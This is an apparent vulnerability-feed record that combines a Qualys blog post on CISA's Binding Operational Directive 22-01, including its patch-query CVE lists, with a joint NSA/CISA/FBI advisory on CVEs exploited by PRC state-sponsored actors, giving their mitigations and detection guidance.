`CVE-2021-1497`,`CVE-2021-1498`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-1782`,`CVE-2021-1870`,`CVE-2021-1871`,`CVE-2021-1879`,`CVE-2021-1905`,`CVE-2021-1906`,`CVE-2021-20016`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-21972`,`CVE-2021-21985`,`CVE-2021-22005`,`CVE-2021-22205`,`CVE-2021-22502`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-22986`,`CVE-2021-26084`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-28663`,`CVE-2021-28664`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-30657`,`CVE-2021-30661`,`CVE-2021-30663`,`CVE-2021-30665`,`CVE-2021-30666`,`CVE-2021-30713`,`CVE-2021-30761`,`CVE-2021-30762`,`CVE-2021-30807`,`CVE-2021-30858`,`CVE-2021-30860`,`CVE-2021-30860`,`CVE-2021-30869`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40444`,`CVE-2021-40539`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42258` ]_\n\n\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using the VMDR Prioritization report.\n\n\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n\n\nWith Qualys Unified Dashboard, you can track your exposure to the CISA Known Exploited Vulnerabilities and gather your status and overall management in real-time. With trending enabled for dashboard widgets, you can keep track of the status of the vulnerabilities in your environment using the [&quot;CISA 2010-21| KNOWN EXPLOITED VULNERABILITIES&quot;](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard:\n\n\n\n### Summary Dashboard High Level Structured by Vendor:\n\n\n\n## Remediation\n\nTo comply with this directive, federal agencies must remediate most &quot;Category 2&quot; vulnerabilities by **November 17, 2021**, and &quot;Category 3&quot; by May 3, 2021. Qualys Patch Management can help streamline the remediation of many of these vulnerabilities.\n\nCustomers can copy the following query into the Patch Management app to help customers comply with the directive&#x27;s aggressive remediation date of November 17, 2021. Running this query will find all required patches and allow quick and efficient deployment of those missing patches to all assets directly from within the Qualys Cloud Platform.\n\ncve:[`CVE-2021-1497`,`CVE-2021-1498`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-1782`,`CVE-2021-1870`,`CVE-2021-1871`,`CVE-2021-1879`,`CVE-2021-1905`,`CVE-2021-1906`,`CVE-2021-20016`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-21972`,`CVE-2021-21985`,`CVE-2021-22005`,`CVE-2021-22205`,`CVE-2021-22502`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-22986`,`CVE-2021-26084`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-28663`,`CVE-2021-28664`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-30657`,`CVE-2021-30661`,`CVE-2021-30663`,`CVE-2021-30665`,`CVE-2021-30666`,`CVE-2021-30713`,`CVE-2021-30761`,`CVE-2021-30762`,`CVE-2021-30807`,`CVE-2021-30858`,`CVE-2021-30860`,`CVE-2021-30860`,`CVE-2021-30869`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40444`,`CVE-2021-40539`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42258` ]\n\n\n\nQualys patch content covers many Microsoft, Linux, and third-party applications; however, some of the vulnerabilities introduced by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch the remaining CVEs in this list.\n\nNote that the due date for \u201cCategory 1\u201d patches has already passed. To find missing patches in your environment for \u201cCategory 1\u201d past due CVEs, copy the following query into the Patch Management app:\n\ncve:[&#x27;CVE-2021-1732\u2032,&#x27;CVE-2020-1350\u2032,&#x27;CVE-2020-1472\u2032,&#x27;CVE-2021-26855\u2032,&#x27;CVE-2021-26858\u2032,&#x27;CVE-2021-27065\u2032,&#x27;CVE-2020-0601\u2032,&#x27;CVE-2021-26857\u2032,&#x27;CVE-2021-22893\u2032,&#x27;CVE-2020-8243\u2032,&#x27;CVE-2021-22900\u2032,&#x27;CVE-2021-22894\u2032,&#x27;CVE-2020-8260\u2032,&#x27;CVE-2021-22899\u2032,&#x27;CVE-2019-11510&#x27;]\n\n\n\n## Federal Enterprises and Agencies Can Act Now\n\nFor federal enterprises and agencies, it&#x27;s a race against time to remediate these vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help achieve compliance with this binding directive. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>).\n\nHere are a few steps Federal enterprises can take immediately:\n\n * Run vulnerability assessments against all your assets by leveraging various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Patch Management to apply patches and other configurations changes\n * Track remediation progress through Unified Dashboards\n\n## Summary\n\nUnderstanding vulnerabilities is a critical but partial part of threat mitigation. Qualys VMDR helps customers discover, assess threats, assign risk, and remediate threats in one solution. Qualys customers rely on the accuracy of Qualys&#x27; threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any organization efficiently respond to the CISA directive.\n\n## Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-09T06:15:01", "type": "qualysblog", "title": "Qualys Response to CISA Alert: Binding Operational Directive 22-01", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2020-0601", "CVE-2020-1350", "CVE-2020-1472", "CVE-2020-8243", "CVE-2020-8260", "CVE-2021-1497", "CVE-2021-1498", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-1782", "CVE-2021-1870", "CVE-2021-1871", "CVE-2021-1879", "CVE-2021-1905", "CVE-2021-1906", "CVE-2021-20016", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-21972", "CVE-2021-21985", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-22502", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-22986", "CVE-2021-26084", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-28663", "CVE-2021-28664", "CVE-2021-30116", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-30657", "CVE-2021-30661", "CVE-2021-30663", "CVE-2021-30665", "CVE-2021-30666", "CVE-2021-30713", "CVE-2021-30761", "CVE-2021-30762", "CVE-2021-30807", "CVE-2021-30858", "CVE-2021-30860", "CVE-2021-30869", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40444", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42258"], "modified": "2021-11-09T06:15:01", "id": "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ics": [{"lastseen": "2023-05-27T16:26:45", "description": "### Summary\n\nThis joint Cybersecurity Advisory (CSA) provides the top Common Vulnerabilities and Exposures (CVEs) used since 2020 by People\u2019s Republic of China (PRC) state-sponsored cyber actors as assessed by the National Security Agency (NSA), Cybersecurity and Infrastructure Security Agency (CISA), and Federal Bureau of Investigation (FBI). PRC state-sponsored cyber actors continue to exploit known vulnerabilities to actively target U.S. and allied networks as well as software and hardware companies to steal intellectual property and develop access into sensitive networks.\n\nThis joint CSA builds on previous NSA, CISA, and FBI reporting to inform federal and state, local, tribal and territorial (SLTT) government; critical infrastructure, including the Defense Industrial Base Sector; and private sector organizations about notable trends and persistent tactics, techniques, and procedures (TTPs).\n\nNSA, CISA, and FBI urge U.S. and allied governments, critical infrastructure, and private sector organizations to apply the recommendations listed in the Mitigations section and Appendix A to increase their defensive posture and reduce the threat of compromise from PRC state-sponsored malicious cyber actors.\n\nFor more information on PRC state-sponsored malicious cyber activity, see CISA\u2019s [China Cyber Threat Overview and Advisories webpage](<https://www.cisa.gov/uscert/china>), FBI\u2019s [Industry Alerts](<https://www.ic3.gov/Home/IndustryAlerts>), and NSA\u2019s [Cybersecurity Advisories &amp; Guidance](<https://www.nsa.gov/Press-Room/Cybersecurity-Advisories-Guidance/>). \n\nDownload the PDF version of this report: [pdf, 409 KB](<https://media.defense.gov/2022/Oct/06/2003092365/-1/-1/0/Joint_CSA_Top_CVEs_Exploited_by_PRC_cyber_actors_.PDF>)\n\n### Technical Details\n\nNSA, CISA, and FBI continue to assess PRC state-sponsored cyber activities as being one of the largest and most dynamic threats to U.S. government and civilian networks. PRC state-sponsored cyber actors continue to target government and critical infrastructure networks with an increasing array of new and adaptive techniques\u2014some of which pose a significant risk to Information Technology Sector organizations (including telecommunications providers), Defense Industrial Base (DIB) Sector organizations, and other critical infrastructure organizations.\n\nPRC state-sponsored cyber actors continue to exploit known vulnerabilities and use publicly available tools to target networks of interest. NSA, CISA, and FBI assess PRC state-sponsored cyber actors have actively targeted U.S. and allied networks as well as software and hardware companies to steal intellectual property and develop access into sensitive networks. See Table 1 for the top used CVEs.\n\n_Table I: Top CVEs most used by Chinese state-sponsored cyber actors since 2020_\n\nVendor\n\n| \n\nCVE\n\n| \n\nVulnerability Type \n \n---|---|--- \n \nApache Log4j\n\n| \n\nCVE-2021-44228\n\n| \n\nRemote Code Execution \n \nPulse Connect Secure\n\n| \n\nCVE-2019-11510\n\n| \n\nArbitrary File Read \n \nGitLab CE/EE\n\n| \n\nCVE-2021-22205\n\n| \n\nRemote Code Execution \n \nAtlassian\n\n| \n\nCVE-2022-26134\n\n| \n\nRemote Code Execution \n \nMicrosoft Exchange\n\n| \n\nCVE-2021-26855\n\n| \n\nRemote Code Execution \n \nF5 Big-IP\n\n| \n\nCVE-2020-5902\n\n| \n\nRemote Code Execution \n \nVMware vCenter Server\n\n| \n\nCVE-2021-22005\n\n| \n\nArbitrary File Upload \n \nCitrix ADC\n\n| \n\nCVE-2019-19781\n\n| \n\nPath Traversal \n \nCisco Hyperflex\n\n| \n\nCVE-2021-1497\n\n| \n\nCommand Line Execution \n \nBuffalo WSR\n\n| \n\nCVE-2021-20090\n\n| \n\nRelative Path Traversal \n \nAtlassian Confluence Server and Data Center\n\n| \n\nCVE-2021-26084\n\n| \n\nRemote Code Execution \n \nHikvision Webserver\n\n| \n\nCVE-2021-36260\n\n| \n\nCommand Injection \n \nSitecore XP\n\n| \n\nCVE-2021-42237\n\n| \n\nRemote Code Execution \n \nF5 Big-IP\n\n| \n\nCVE-2022-1388\n\n| \n\nRemote Code Execution \n \nApache\n\n| \n\nCVE-2022-24112\n\n| \n\nAuthentication Bypass by Spoofing \n \nZOHO\n\n| \n\nCVE-2021-40539\n\n| \n\nRemote Code Execution \n \nMicrosoft\n\n| \n\nCVE-2021-26857\n\n| \n\nRemote Code Execution \n \nMicrosoft\n\n| \n\nCVE-2021-26858\n\n| \n\nRemote Code Execution \n \nMicrosoft\n\n| \n\nCVE-2021-27065\n\n| \n\nRemote Code Execution \n \nApache HTTP Server\n\n| \n\nCVE-2021-41773\n\n| \n\nPath Traversal \n \nThese state-sponsored actors continue to use virtual private networks (VPNs) to obfuscate their activities and target web-facing applications to establish initial access. Many of the CVEs indicated in Table 1 allow the actors to surreptitiously gain unauthorized access into sensitive networks, after which they seek to establish persistence and move laterally to other internally connected networks. For additional information on PRC state-sponsored cyber actors targeting network devices, please see [People\u2019s Republic of China State-Sponsored Cyber Actors Exploit Network Providers and Devices](<https://www.nsa.gov/Press-Room/Press-Releases-Statements/Press-Release-View/Article/3055748/nsa-cisa-and-fbi-expose-prc-state-sponsored-exploitation-of-network-providers-d/>).\n\n### Mitigations\n\nNSA, CISA, and FBI urge organizations to apply the recommendations below and those listed in Appendix A.\n\n * Update and patch systems as soon as possible. Prioritize patching vulnerabilities identified in this CSA and other [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n * Utilize phishing-resistant multi-factor authentication whenever possible. Require all accounts with password logins to have strong, unique passwords, and change passwords immediately if there are indications that a password may have been compromised. \n * Block obsolete or unused protocols at the network edge. \n * Upgrade or replace end-of-life devices.\n * Move toward the Zero Trust security model. \n * Enable robust logging of Internet-facing systems and monitor the logs for anomalous activity. \n\n\n## Appendix A\n\n_Table II: Apache CVE-2021-44228_\n\nApache CVE-2021-44228 CVSS 3.0: 10 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nApache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against malicious actor controlled LDAP and other JNDI related endpoints. A malicious actor who can control log messages or log message parameters could execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects. \n \n_Recommended Mitigations_\n\n * Apply patches provided by vendor and perform required system updates. \n \n_Detection Methods_\n\n * See vendor\u2019s [Guidance For Preventing, Detecting, and Hunting for Exploitation of the Log4j 2 Vulnerability](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>). \n \n_Vulnerable Technologies and Versions_\n\nThere are numerous vulnerable technologies and versions associated with CVE-2021-44228. For a full list, check <https://nvd.nist.gov/vuln/detail/CVE-2021-44228>. \n \n_Table III: Pulse CVE-2019-11510_\n\nPulse CVE-2019-11510 CVSS 3.0: 10 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nThis vulnerability has been modified since it was last analyzed by NVD. It is awaiting reanalysis, which may result in further changes to the information provided. In Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4, an unauthenticated remote malicious actor could send a specially crafted URI to perform an arbitrary file reading vulnerability. \n \n_Recommended Mitigations_\n\n * Apply patches provided by vendor and perform required system updates. \n \n_Detection Methods_\n\n * Use CISA\u2019s \u201cCheck Your Pulse\u201d Tool. \n \n_Vulnerable Technologies and Versions_\n\nPulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 \n \n_Table IV: GitLab CVE-2021-22205_\n\nGitLab CVE-2021-22205 CVSS 3.0: 10 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nAn issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files passed to a file parser, which resulted in a remote command execution. \n \n_Recommended Mitigations_\n\n * Update to 12.10.3, 13.9.6, and 13.8.8 for GitLab.\n * Hotpatch is available via GitLab. \n \n_Detection Methods_\n\n * Investigate logfiles.\n * Check GitLab Workhorse. \n \n_Vulnerable Technologies and Versions_\n\nGitlab CE/EE. \n \n_Table V: Atlassian CVE-2022-26134_\n\nAtlassian CVE-2022-26134 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nIn affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that could allow an unauthenticated malicious actor to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are from 1.3.0 before 7.4.17, 7.13.0 before 7.13.7, 7.14.0 before 7.14.3, 7.15.0 before 7.15.2, 7.16.0 before 7.16.4, 7.17.0 before 7.17.4, and 7.18.0 before 7.18.1. \n \n_Recommended Mitigations_\n\n * Immediately block all Internet traffic to and from affected products AND apply the update per vendor instructions. \n * Ensure Internet-facing servers are up-to-date and have secure compliance practices. \n * Short term workaround is provided [here](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>). \n \n_Detection Methods_\n\nN/A \n \n_Vulnerable Technologies and Versions_\n\nAll supported versions of Confluence Server and Data Center\n\nConfluence Server and Data Center versions after 1.3.0 \n \n_Table VI: Microsoft CVE-2021-26855_\n\nMicrosoft CVE-2021-26855 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nMicrosoft has released security updates for Windows Exchange Server. To exploit these vulnerabilities, an authenticated malicious actor could send malicious requests to an affected server. A malicious actor who successfully exploited these vulnerabilities would execute arbitrary code and compromise the affected systems. If successfully exploited, these vulnerabilities could allow an adversary to obtain access to sensitive information, bypass security restrictions, cause a denial of service conditions, and/or perform unauthorized actions on the affected Exchange server, which could aid in further malicious activity. \n \n_Recommended Mitigations_\n\n * Apply the appropriate Microsoft Security Update.\n * Microsoft Exchange Server 2013 Cumulative Update 23 (KB5000871)\n * Microsoft Exchange Server 2016 Cumulative Update 18 (KB5000871)\n * Microsoft Exchange Server 2016 Cumulative Update 19 (KB5000871)\n * Microsoft Exchange Server 2019 Cumulative Update 7 (KB5000871)\n * Microsoft Exchange Server 2019 Cumulative Update 8 (KB5000871)\n * Restrict untrusted connections. \n \n_Detection Methods_\n\n * Analyze Exchange product logs for evidence of exploitation.\n * Scan for known webshells. \n \n_Vulnerable Technologies and Versions_\n\nMicrosoft Exchange 2013, 2016, and 2019. \n \n_Table VII: F5 CVE-2020-5902_\n\nF5 CVE-2020-5902 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nIn BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages. \n \n_Recommended Mitigations_\n\n * Apply FY BIG-IP Update.\n * Restrict access to the configuration utility. \n \n_Detection Methods_\n\n * Use F5\u2019s [CVE-2020-5902 IoC Detection Tool](<https://github.com/f5devcentral/cve-2020-5902-ioc-bigip-checker/>).\n * Additional detection methods can be found at <https://support.f5.com/csp/article/K52145254>. \n \n_Vulnerable Technologies and Versions_\n\nF5 Big-IP Access Policy Manager\n\nF5 Big-IP Advanced Firewall Manager\n\nF5 Big-IP Advanced Web Application Firewall\n\nF5 Big-IP Analytics\n\nF5 Big-IP Application Acceleration Manager\n\nF5 Big-IP Application Security Manager\n\nF5 Big-IP Ddos Hybrid Defender\n\nF5 Big-IP Domain Name System (DNS)\n\nF5 Big-IP Fraud Protection Service (FPS)\n\nF5 Big-IP Global Traffic Manager (GTM)\n\nF5 Big-IP Link Controller\n\nF5 Networks Big-IP Local Traffic Manager (LTM)\n\nF5 Big-IP Policy Enforcement Manager (PEM)\n\nF5 SSL Orchestrator \n \n_References_\n\n<https://support.f5.com/csp/article/K00091341>\n\n<https://support.f5.com/csp/article/K07051153>\n\n<https://support.f5.com/csp/article/K20346072>\n\n<https://support.f5.com/csp/article/K31301245>\n\n<https://support.f5.com/csp/article/K33023560>\n\n<https://support.f5.com/csp/article/K43638305>\n\n<https://support.f5.com/csp/article/K52145254>\n\n<https://support.f5.com/csp/article/K82518062> \n \n_Table VIII: VMware CVE-2021-22005_\n\nVMware CVE-2021-22005 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nThe vCenter Server contains an arbitrary file upload vulnerability in the Analytics service. A malicious actor with network access to port 443 on vCenter Server may exploit this issue to execute code on vCenter Server by uploading a specially crafted file. \n \n_Recommended Mitigations_\n\n * Apply Vendor Updates. \n \n_Detection Methods_\n\nN/A \n \n_Vulnerable Technologies and Versions_\n\nVMware Cloud Foundation\n\nVMware VCenter Server \n \n_Table IX: Citrix CVE-2019-19781_\n\nCitrix CVE-2019-19781 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nThis vulnerability has been modified since it was last analyzed by NVD. It is awaiting reanalysis, which may result in further changes to the information provided. An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal. \n \n_Recommended Mitigations_\n\n * Apply vendor [mitigations](<https://support.citrix.com/article/CTX267679/mitigation-steps-for-cve201919781>).\n * Use the CTX269180 - [CVE-2019-19781 Verification Tool](<https://support.citrix.com/article/CTX269180/cve201919781-verification-tool>) provided by Citrix. \n \n_Detection Methods_\n\nN/A \n \n_Vulnerable Technologies and Versions_\n\nCitrix ADC, Gateway, and SD-WAN WANOP \n \n_Table X: Cisco CVE-2021-1497_\n\nCisco CVE-2021-1497 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nMultiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote malicious actor to perform a command injection against an affected device. For more information about these vulnerabilities, see the Technical details section of this advisory. \n \n_Recommended Mitigations_\n\n * Apply Cisco software updates. \n \n_Detection Methods_\n\n * Look at the Snort [Rules](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-rce-TjjNrkpR#details>) provided by Cisco. \n \n_Vulnerable Technologies and Versions_\n\nCisco Hyperflex Hx Data Platform 4.0(2A) \n \n_Table XI: Buffalo CVE-2021-20090_\n\nBuffalo CVE-2021-20090 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nA path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version &lt;= 1.02 and WSR-2533DHP3 firmware version &lt;= 1.24 could allow unauthenticated remote malicious actors to bypass authentication. \n \n_Recommended Mitigations_\n\n * Update firmware to latest available version. \n \n_Detection Methods_\n\n * N/A \n \n_Vulnerable Technologies and Versions_\n\nBuffalo Wsr-2533Dhpl2-Bk Firmware\n\nBuffalo Wsr-2533Dhp3-Bk Firmware \n \n_Table XII: Atlassian CVE-2021-26084_\n\nAtlassian CVE-2021-26084 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nIn affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated malicious actor to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are before version 6.13.23 and from version 6.14.0 before 7.4.11, version 7.5.0 before 7.11.6, and version 7.12.0 before 7.12.5. \n \n_Recommended Mitigations_\n\n * Update confluence version to 6.13.23, 7.4.11, 7.11.6, 7.12.5, and 7.13.0.\n * Avoid using end-of-life devices.\n * Use Intrusion Detection Systems (IDS). \n \n_Detection Methods_\n\nN/A \n \n_Vulnerable Technologies and Versions_\n\nAtlassian Confluence\n\nAtlassian Confluence Server\n\nAtlassian Data Center\n\nAtlassian Jira Data Center \n \n_Table XIII: Hikvision CVE-2021-36260_\n\nHikvision CVE-2021-36260 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nThis vulnerability has been modified since it was last analyzed by NVD. It is awaiting reanalysis, which may result in further changes to the information provided. A command injection vulnerability exists in the web server of some Hikvision products. Due to the insufficient input validation, a malicious actor can exploit the vulnerability to launch a command injection by sending some messages with malicious commands. \n \n_Recommended Mitigations_\n\n * Apply the latest firmware updates. \n \n_Detection Methods_\n\nN/A \n \n_Vulnerable Technologies and Versions_\n\nVarious Hikvision Firmware to include Ds, Ids, and Ptz \n \n_References_\n\n<https://www.cisa.gov/uscert/ncas/current-activity/2021/09/28/rce-vulnerability-hikvision-cameras-cve-2021-36260> \n \n_Table XIV: Sitecore CVE-2021-42237_\n\nSitecore CVE-2021-42237 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nSitecore XP 7.5 Initial Release to Sitecore XP 8.2 Update-7 is vulnerable to an insecure deserialization attack where it is possible to achieve remote command execution on the machine. No authentication or special configuration is required to exploit this vulnerability. \n \n_Recommended Mitigations_\n\n * Update to latest version.\n * Delete the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx. \n \n_Detection Methods_\n\n * N/A \n \n_Vulnerable Technologies and Versions_\n\nSitecore Experience Platform 7.5, 7.5 Update 1, and 7.5 Update 2\n\nSitecore Experience Platform 8.0, 8.0 Service Pack 1, and 8.0 Update 1-Update 7\n\nSitecore Experience Platform 8.0 Service Pack 1\n\nSitecore Experience Platform 8.1, and Update 1-Update 3\n\nSitecore Experience Platform 8.2, and Update 1-Update 7 \n \n_Table XV: F5 CVE-2022-1388_\n\nF5 CVE-2022-1388 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nThis vulnerability has been modified since it was last analyzed by NVD. It is awaiting reanalysis, which may result in further changes to the information provided. On F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions, undisclosed requests may bypass iControl REST authentication. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated. \n \n_Recommended Mitigations_\n\n * Block iControl REST access through the self IP address.\n * Block iControl REST access through the management interface.\n * Modify the BIG-IP httpd configuration. \n \n_Detection Methods_\n\nN/A \n \n_Vulnerable Technologies and Versions_\n\nBig IP 